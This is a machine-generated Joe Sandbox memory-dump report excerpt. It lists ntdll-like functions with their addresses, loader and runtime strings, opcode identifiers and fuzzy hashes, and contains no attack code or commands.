                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
                                                                                  • Instruction ID: 2a7923284240c63850e5eb5668e228fd38eaefff4841f2b7f0dcb9b1b5d3addb
                                                                                  • Opcode Fuzzy Hash: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
                                                                                  • Instruction Fuzzy Hash: FDF0C231A40319BBD724EA48DD57FD9376CFB41B54F540069F6407B282D6B8E940EA92
                                                                                  Function 00F503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
                                                                                  • Instruction ID: 011816e10652248c50b3c1f233102a6fa875551fbc7db04e0983615c366eb588
                                                                                  • Opcode Fuzzy Hash: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
                                                                                  • Instruction Fuzzy Hash: 78715DB1A0014A9FCB01DF98C981FAEB7F8EF48754F144065EA05E7251EA78EE05DB60
                                                                                  Function 00F4A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrResSearchResource Enter, xrefs: 00F4AA13
                                                                                  • LdrResSearchResource Exit, xrefs: 00F4AA25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  • Opcode ID: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
                                                                                  • Instruction ID: 1e71dfa7646d3feb79f7a8b6ec773aeaf3c794a0d92a344c4c27deb59bd6636a
                                                                                  • Opcode Fuzzy Hash: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
                                                                                  • Instruction Fuzzy Hash: 34E170B2E40218DFEB219E98C980BAEBBB9EF55364F14402AFD01E7251D778DD40EB51
                                                                                  Function 0100A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: 7ea7008e5ac5e0e598f74a957c0525356a797b2f31d26a8f15954dc7300b1b77
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 0AC18C313043429BE726CE28C841B6ABBE5BFC4314F188A2DF6D68B2D1D775D545CB51
                                                                                  Function 00FBE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
                                                                                  • Instruction ID: bd49bfa2cb1141b53843d57a3a748180241291fb1684fffaae904888ff8ce0cc
                                                                                  • Opcode Fuzzy Hash: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
                                                                                  • Instruction Fuzzy Hash: 3F614A72E006189FDB14DFA9C841BEEBBB5FB48700F204169E559EB291DA31E900EF50
                                                                                  Function 00FE43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
                                                                                  • Instruction ID: 2e21c936143f76335e4441df83172551d024f7b79b5ad50ae672f14b054e299b
                                                                                  • Opcode Fuzzy Hash: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
                                                                                  • Instruction Fuzzy Hash: 795145B1E0025DAFDB11DFA5CC81AEEBBB8EB48754F140529E900B7281D634AE05DBA0
                                                                                  Function 00F404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • kLsE, xrefs: 00F40540
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F4063D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
                                                                                  • Instruction ID: d27c42d1eb6b541f8210f9e3856a185e7b0648f7cc5e1eeb4cfae57d0528103d
                                                                                  • Opcode Fuzzy Hash: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
                                                                                  • Instruction Fuzzy Hash: 9C51BE729047469FC724EF64C4406A7BBE8EF84714F04883EEADA87241EB74E945DF92
                                                                                  Function 00F4A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 00F4A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 00F4A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
                                                                                  • Instruction ID: a4999bfb603fd472fd582585132ff859a0e38a367f0ddd4086955fb5e5142e8d
                                                                                  • Opcode Fuzzy Hash: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
                                                                                  • Instruction Fuzzy Hash: 5B419C71A44649DBDB21CF69C840B6ABBB4EF85750F2440A9EC01DB291E376DA40EB51
                                                                                  Function 00F7A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
                                                                                  • Instruction ID: 4899c2fb53e50cd2b35b395c2770369e427a864c7df05c331f427daa1dd78e55
                                                                                  • Opcode Fuzzy Hash: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
                                                                                  • Instruction Fuzzy Hash: DE01ADB2240B00EFD311DF14CD46B1A77E8E784B15F05893AA54CC7190E739EA04EB47
                                                                                  Function 00F4C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
                                                                                  • Instruction ID: fb439a69642d221f57d3b1dfc8540d7c9e1a712044e625d0272f57a18e910ffa
                                                                                  • Opcode Fuzzy Hash: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
                                                                                  • Instruction Fuzzy Hash: 6A825C75E012188FDB64CFA9C880BADBBB1FF48720F14816AEC59AB351D7749D41EB90
                                                                                  Function 00FC6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: e50bb092bbaa4174643df7a19a2e6f7c03c32fb3d4031d137befefd0d994f1a3
                                                                                  • Instruction ID: 52c2391da54ee7d4fe697db24310f3d2a71edb8d794e96bedcdcaa07d735570b
                                                                                  • Opcode Fuzzy Hash: e50bb092bbaa4174643df7a19a2e6f7c03c32fb3d4031d137befefd0d994f1a3
                                                                                  • Instruction Fuzzy Hash: E19164B1940219AFDB21DF94CD86FAE77B8EF04B50F240069F601EB191D775AD04EB60
                                                                                  Function 00FEE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 8f0533e730d8f552262d78f68b7078b14a9490094d4afec93d1aff6682eb7694
                                                                                  • Instruction ID: 323bede1d386ade068cc5ec33cec97c75d4bebc50242313b903f94542b2ecce3
                                                                                  • Opcode Fuzzy Hash: 8f0533e730d8f552262d78f68b7078b14a9490094d4afec93d1aff6682eb7694
                                                                                  • Instruction Fuzzy Hash: 2291D232D00589AFDB22AFA5EC45FAFBB79EF85750F100019F500A7251EB789905EB51
                                                                                  Function 00F7A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  • Opcode ID: 691a546c9e853acca228d9c867aa43cccd11dd47473ac1a0ea83347b2ab30aa8
                                                                                  • Instruction ID: 62d3978907dca023146ce99a6a211233be1e9ddca9a9c8d575a3a3bd80559be3
                                                                                  • Opcode Fuzzy Hash: 691a546c9e853acca228d9c867aa43cccd11dd47473ac1a0ea83347b2ab30aa8
                                                                                  • Instruction Fuzzy Hash: DE716F75E0021A9FDF28DF9AC9916EDBBB1BF48714F24812AE405E7240DB399D41EF50
                                                                                  Function 00FE4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  • Opcode ID: 01bbfda2974deda2a37be3674d731775d79f6ed14b774fa38e1f77f2a441d9de
                                                                                  • Instruction ID: bf0d86bf4e114450dc27d315b4bb997d6471f2b0c4e3658901076525d527f271
                                                                                  • Opcode Fuzzy Hash: 01bbfda2974deda2a37be3674d731775d79f6ed14b774fa38e1f77f2a441d9de
                                                                                  • Instruction Fuzzy Hash: 12519372D002699BCF10DF9AD840AAEB7B5AF44B20F05412EE915BB341D73CAD05EFA4
                                                                                  Function 00F5E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
                                                                                  • API String ID: 0-1948896318
                                                                                  • Opcode ID: 6f427873c59db60fe2f6e1f0e1e9dd803227ec33060cd833be02e3371bada0ee
                                                                                  • Instruction ID: caf829e3309aaeee2f08e845681d7bc946e2026ab1cd9719fb5a1858bd4b68b5
                                                                                  • Opcode Fuzzy Hash: 6f427873c59db60fe2f6e1f0e1e9dd803227ec33060cd833be02e3371bada0ee
                                                                                  • Instruction Fuzzy Hash: 9941B0729083019BD714DA74D841B6BB7E8AF8CB15F04092DFE94E7180E678DA08E797
                                                                                  Function 00FBC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: 68f645879b6b4df87c8e126e3c2c157c6c44c1ab25fbaf41fa5755bbbe4a38f4
                                                                                  • Instruction ID: 8661e708b9de4ab68449a9e5c8bade42b760f2ec69533a6a0971b10039a5dae9
                                                                                  • Opcode Fuzzy Hash: 68f645879b6b4df87c8e126e3c2c157c6c44c1ab25fbaf41fa5755bbbe4a38f4
                                                                                  • Instruction Fuzzy Hash: 744163B1D0012CABDB21DA61CC85FDFB77CAB44714F0045A5FA08AB141DB749E899FE4
                                                                                  Function 00FD6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: 513d06930ebb08bd375bfb02584e7075fe003beff4e81f7a4200a0cf9ca70f34
                                                                                  • Instruction ID: 4bd24e7c27e0000177465668f96046f74a3121452ca5e3caa4ff054335ed5a9e
                                                                                  • Opcode Fuzzy Hash: 513d06930ebb08bd375bfb02584e7075fe003beff4e81f7a4200a0cf9ca70f34
                                                                                  • Instruction Fuzzy Hash: 24312631A107189BDB22DB68CC50BEE77A9DF44715F18402AE980EB382DB79EC05EB50
                                                                                  Function 00FBCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryName
                                                                                  • API String ID: 0-215506332
                                                                                  • Opcode ID: 804e06751bf492ba21dc050f549d0160666074b389c75010f7fe30b8a95765fa
                                                                                  • Instruction ID: 4c3555687dbda2e83abb17bd3c813826515a70e329d44021e3702763f2d30ed7
                                                                                  • Opcode Fuzzy Hash: 804e06751bf492ba21dc050f549d0160666074b389c75010f7fe30b8a95765fa
                                                                                  • Instruction Fuzzy Hash: 3031F736D00519AFDB15DB5AC856EAFB7B4EFC0760F118129E905A7291D730AE04EFE0
                                                                                  Function 00FC892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FC895E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  • API String ID: 0-702105204
                                                                                  • Opcode ID: 34f2ec1471551afb40288e58b3a7784bcf853f2d5caf8fb240b3bf4f79952a20
                                                                                  • Instruction ID: dd0e600e755c8a78ae1748446a31d9abed6edc87697ec89aa70d3890a535ba19
                                                                                  • Opcode Fuzzy Hash: 34f2ec1471551afb40288e58b3a7784bcf853f2d5caf8fb240b3bf4f79952a20
                                                                                  • Instruction Fuzzy Hash: 04012B326002129BD7249B51DE87F7A7B69EFC2BE0F04042CF58116962CF75AC46F796
                                                                                  Function 00FE2000 Relevance: .8, Instructions: 757COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e095adc571f87902360212e7932ce2fe74ccfc36d601c9cf16397139c48f1ce4
                                                                                  • Instruction ID: 56c293057b9678e5350bf08f4e57f23137fcc7c6011617839f7d2ecb7db2d9fd
                                                                                  • Opcode Fuzzy Hash: e095adc571f87902360212e7932ce2fe74ccfc36d601c9cf16397139c48f1ce4
                                                                                  • Instruction Fuzzy Hash: 7342F572A083818FD765CF66C891B6BB7E9BF84710F18092EF98287250E734DD45EB52
                                                                                  Function 00FD8158 Relevance: .6, Instructions: 617COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3841fe7a7921ce9965df2ef6ec36f5f12ad9248410b24a55cdf4089ba396d200
                                                                                  • Instruction ID: c277ef9a9dc2c1bf387a998885d1bcf25d3aa0030754eebfa1f524b0204434f3
                                                                                  • Opcode Fuzzy Hash: 3841fe7a7921ce9965df2ef6ec36f5f12ad9248410b24a55cdf4089ba396d200
                                                                                  • Instruction Fuzzy Hash: C7424B75E002198FDB24CF69C841BADB7F6BF48350F18819AE949AB342DB349D86DF50
                                                                                  Function 00F52840 Relevance: .6, Instructions: 605COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: af3025cd610cc756380b26cf622ed5a7e8cf4dbf344c18105af0d1f0dbd5721c
                                                                                  • Instruction ID: 163844a79d9e8be7195abad47b20c5f9a35c14b6c8458bd63e9bc8ea984b1e7f
                                                                                  • Opcode Fuzzy Hash: af3025cd610cc756380b26cf622ed5a7e8cf4dbf344c18105af0d1f0dbd5721c
                                                                                  • Instruction Fuzzy Hash: 3E32CFB1A007558FDB24CF65C8447BEBBF6BF86314F28411DE886DB284D739A805EB50
                                                                                  Function 00FEA118 Relevance: .6, Instructions: 591COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c0c2a634e5253a8c83900199e22f32900590c2d99aabbdae7ef545d3b2cc7509
                                                                                  • Instruction ID: cfc9402898faf413bb3a510f8a01209d5a9fc857bc5daa19da74089c2ecd6936
                                                                                  • Opcode Fuzzy Hash: c0c2a634e5253a8c83900199e22f32900590c2d99aabbdae7ef545d3b2cc7509
                                                                                  • Instruction Fuzzy Hash: 9C22F475A046D18FDB25CF2AC090372B7F1AF45310F18849AE8968F296D735F852FB62
                                                                                  Function 00F46A50 Relevance: .5, Instructions: 548COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1fdcef16bdd66e984bf166ebd5256f6696016f02e605ed7040559c366c1aa8fd
                                                                                  • Instruction ID: 03b60290ec8ae5b564e48034d12f79ae2bc1bef991e2030fbfe92c63d0850ccf
                                                                                  • Opcode Fuzzy Hash: 1fdcef16bdd66e984bf166ebd5256f6696016f02e605ed7040559c366c1aa8fd
                                                                                  • Instruction Fuzzy Hash: 95327975A00605CFDB24CF68C880BAABBF1FF8A310F258569E955EB391D734AC41EB51
                                                                                  Function 00F64A35 Relevance: .4, Instructions: 423COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction ID: 04b020695729b6725f512a4817f4407571923060da137096ba031862ae751583
                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction Fuzzy Hash: 5CF19E71E0121A9BCF15DFA9C980BAEB7F5BF49710F048129E801AB341E774EC42EB60
                                                                                  Function 00FD892B Relevance: .4, Instructions: 386COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6e1d7dde807b53bc13976c515dc5ee95562c414b137cf46481d9ad7bec6166b1
                                                                                  • Instruction ID: ef11812ce541cf9cfa7e6889b72e7a1bc2cb28fea7b94573e61ba37afa47f574
                                                                                  • Opcode Fuzzy Hash: 6e1d7dde807b53bc13976c515dc5ee95562c414b137cf46481d9ad7bec6166b1
                                                                                  • Instruction Fuzzy Hash: 16D1F372E006199BDB05CF59C841BFEB7F2AF84394F18816BD855E7380DB39E9069B60
                                                                                  Function 00F465D0 Relevance: .4, Instructions: 383COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f662834c7d1af7b29958680c4348525223af43e71a44db751818f9d1f5a2b1c
                                                                                  • Instruction ID: 08735418226108c1d06760e2b59376dce29cc36a149eb961f76bcbe45a0c9322
                                                                                  • Opcode Fuzzy Hash: 6f662834c7d1af7b29958680c4348525223af43e71a44db751818f9d1f5a2b1c
                                                                                  • Instruction Fuzzy Hash: E8E16C71908341CFC714CF28C490A6ABBE0FF9A318F158A6DE995CB351DB31E949DB92
                                                                                  Function 00F38397 Relevance: .4, Instructions: 380COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7b4cc8ed4a67eef2c9d2e47ccb721fbd3f2913ae5f2597d4d51d988180c0e1df
                                                                                  • Instruction ID: 445f421de0d2ad0c64f366c597cee07be0c360fccc34b0ca49ddabc5a62acd5c
                                                                                  • Opcode Fuzzy Hash: 7b4cc8ed4a67eef2c9d2e47ccb721fbd3f2913ae5f2597d4d51d988180c0e1df
                                                                                  • Instruction Fuzzy Hash: E3D10272A00316DBDF14CF65CD81BBA77A5BF44364F244229F816DB281EB38E946EB50
                                                                                  Function 00FC8243 Relevance: .3, Instructions: 322COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction ID: bee79d83f2aa44d41a6e5e674f0b0fedab746313d62a23a59f659da36ce1f24c
                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction Fuzzy Hash: FAB19374E006069FDB24DB94CA46FABB7B9BF84394F14442EA90297791DE34ED06EB10
